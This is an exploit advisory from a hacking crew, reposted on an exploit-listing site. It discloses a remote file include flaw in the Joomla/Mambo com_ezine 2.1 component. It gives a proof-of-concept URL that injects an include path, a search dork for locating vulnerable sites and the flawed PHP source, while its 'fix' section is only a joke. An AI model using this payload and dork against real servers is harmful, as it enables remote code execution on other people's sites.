|    |    |    | Today: 18-Nov-2019 |

Joomla / Mambo Component com_ezine Remote File Include Vulnerability

November 17, 2009 | Posted in ExploitAlert


#####################################################################################################
## Joomla / Mambo Component com_ezine Remote File Include vulnerability ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : October 20 2009 ##
#####################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#####################################################################################################


[ Software Information ]

[+] Vendor : http://designformamb0.c0m
[+] Download : -
[+] version : 2.1
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_ezine"
[+] Location : INDONESIA

[DESCRIPTION]

/**
* eZine component v2.1
*
* @copyright Nguyen Manh Cuong
* Author`s email : cu0ngnm@designformamb0.c0m
* Author`s hompage : http://designformamb0.c0m
*
* @license Commercial Product - Single Site License or Free to Use with Limitation
**/

###############################################

[ PoC ]

http://127.0.0.1/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]

[ Bugs File ]

[+] d4m_ajax_pagenav.php

// Extend mosPageNav class
require_once( $GLOBALS['mosConfig_absolute_path'] . '/includes/pageNavigation.php' );
// Define new Page Navigation class
class ajaxPageNav extends mosPageNav {
// Rewrite writePagesLinks() function to build ajax friendly URL
function writeAjaxLinks( $link ) {
$txt = '';

$displayed_pages = 10;
$total_pages = ceil( $this->total / $this->limit );
$this_page = ceil( ($this->limitstart+1) / $this->limit );
$start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1;
if ($start_loop + $displayed_pages - 1 < $total_pages) {
$stop_loop = $start_loop + $displayed_pages - 1;
} else {
$stop_loop = $total_pages;
}

if ($this_page > 1) {
$page = ($this_page - 2) * $this->limit;
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
} else {
$txt .= '<< '. _PN_START .' ';
$txt .= '< '. _PN_PREVIOUS .' ';
}

for ($i=$start_loop; $i <= $stop_loop; $i++) {
$page = ($i - 1) * $this->limit;
if ($i == $this_page) {
$txt .= ''. $i .' ';
} else {
$txt .= ''. $i .' ';
}
}

if ($this_page < $total_pages) {
$page = $this_page * $this->limit;
$end_page = ($total_pages-1) * $this->limit;
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
} else {
$txt .= ''. _PN_NEXT .' > ';
$txt .= ''. _PN_END .' >>';
}
return $txt;
}
}

[ FIX ]

Tukulesto said : talk to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae

Joke.. ;)
###############################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh
[+] makasih buat om tukulesto buat perl exploit nye .. huahhh
[+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha
[+] om tukulesto kutunggu kau di kotaku .. :D

Taged in: component, ezine, include, Joomla, mambo, Remote, vulnerability